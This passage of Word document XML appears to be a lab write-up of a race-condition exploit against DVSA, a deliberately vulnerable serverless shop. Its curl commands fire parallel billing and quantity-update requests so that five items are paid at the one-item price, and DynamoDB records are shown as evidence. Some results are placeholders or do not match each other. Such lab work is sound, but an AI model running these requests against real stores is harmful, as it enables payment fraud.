    </w:tbl>
    <w:p w14:paraId="2AD324FD" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 1: Terminal output showing the new order creation with order-id returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374A1472" w14:textId="77777777" w:rsidR="00330F91" w:rsidRDefault="00330F91">
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013ED116" w14:textId="7171D6CB" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2 — Add Shipping Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E7DDEE" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Add shipping information so the order can proceed to billing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1739E25C" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X POST "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AD9BC5" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793D9ED1" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Authorization: $TOKEN" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C02B85A" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d '{"action":"shipping","order-id":"'$ORDER_ID'",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F673B46" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">       "data":{"address":"123 Test St",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5659B974" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">              "email":"test@example.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2C8CDA" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">              "name":"Test User"}}' | jq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07246EC0" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Observed result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB97047" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>{ "status": "ok", "msg": "address updated"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F50AC" w14:paraId="52AC1A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300" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="300" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="27AA7DE2" w14:textId="48C59D6E" w:rsidR="00CF50AC" w:rsidRDefault="00330F91">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00330F91">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B85C00"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60356F48" wp14:editId="7CFB13B0">
                  <wp:extent cx="5943600" cy="789940"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="183983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31527" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId8"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="789940"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F843A37" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 2: Terminal output showing shipping details added successfully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBA2E63" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 3 — Fire Exactly Two Parallel Requests (The Race)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47928712" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Send the billing request and the update request simultaneously. The billing request processes payment for the original 1-item total, while the update request changes the item quantity to 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B54A829" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X POST "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C418F1" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FDAC8B" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Authorization: $TOKEN" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D125EA" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d '{"action":"billing","order-id":"'$ORDER_ID'",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA85E8B" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">       "data":{"ccn":"4242424242424242",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683FE0D9" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">              "exp":"11/28","cvv":"123"}}' &gt; billing_result.json &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A1C350" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00CF50AC">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CED623" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>curl -s -X POST "$API" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF9E324" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Content-Type: application/json" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038BC189" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Authorization: $TOKEN" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238C5600" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  -d '{"action":"update","order-id":"'$ORDER_ID'",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CBFE70" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">       "items":{"1":5}}' &gt; update_result.json &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ECF09F" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00CF50AC">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D7C6BF" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F07610" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The ampersand (&amp;) sends each curl to the background, making them execute concurrently. The race condition attempt was automated with a script that creates a fresh order each attempt, since timing must be precise.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F50AC" w14:paraId="3CC994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300" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="300" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4FF9CA0F" w14:textId="684E809F" w:rsidR="00CF50AC" w:rsidRDefault="00BB159C">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00BB159C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B85C00"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26A93B8A" wp14:editId="455DE690">
                  <wp:extent cx="5943600" cy="1200785"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5715"/>
                  <wp:docPr id="202162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24864" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId9"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="1200785"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C4BAC5D" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 3: Terminal output showing both parallel curl commands completing (billing and update responses)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E202376" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 4 — Check the Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD17C5" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>After both requests complete, check the responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7585B95A" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>echo "=== BILLING RESULT ==="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2624BB44" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cat billing_result.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A30E60F" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>echo "=== UPDATE RESULT ==="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F6BCCA" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cat update_result.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B58E70" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Successful exploit result observed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04263EAD" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Billing response: </w:t>
      </w:r>
      <w:r>
        <w:t>{"status":"ok","amount":XX,"token":"...","missing":{}} — billing succeeded and charged the original low amount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3F1A1C" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Update response: </w:t>
      </w:r>
      <w:r>
        <w:t>{"status":"ok","msg":"cart updated"} — the update also succeeded, changing quantity to 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D984E7" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Both requests succeeded on the same order, meaning the attacker paid for the original amount but the order now contains 5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F50AC" w14:paraId="29C4DC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300" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="300" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="002BC22D" w14:textId="097DD40F" w:rsidR="00CF50AC" w:rsidRDefault="00BB159C">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00BB159C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B85C00"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B3D090F" wp14:editId="2F915479">
                  <wp:extent cx="5943600" cy="1800860"/>
                  <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                  <wp:docPr id="154955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54687" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId10"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="1800860"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0044CA1A" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 4: Terminal showing billing result with the paid amount (e.g., amount: 33 or similar low value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A09EB8F" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 5) Evidence and Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199EBBEC" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerability is confirmed by the following evidence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799C0EF8" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Evidence 1: DynamoDB Order Record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F72FCF" w14:textId="7C265AC4" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The DynamoDB record for order </w:t>
      </w:r>
      <w:r w:rsidR="00BB159C">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="39C026"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>32199499-d1dc-40c0-88e4-43bf8f93b76c</w:t>
      </w:r>
      <w:r w:rsidR="00BB159C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>in the DVSA-ORDERS-DB table shows the mismatch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF211D0" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>itemList: {"1": {"N": "5"}} — the order contains 5 items (update succeeded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A2048B" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>orderStatus: {"N": "100"} — the order is marked as processed (billing succeeded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66953A3C" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>totalAmount: {"N": "0"} — the total amount is 0 (billing processed before the total was properly calculated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E805AA" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>paymentTS: {"N": "1777482640"} — a payment timestamp exists, confirming billing ran</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312DF385" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
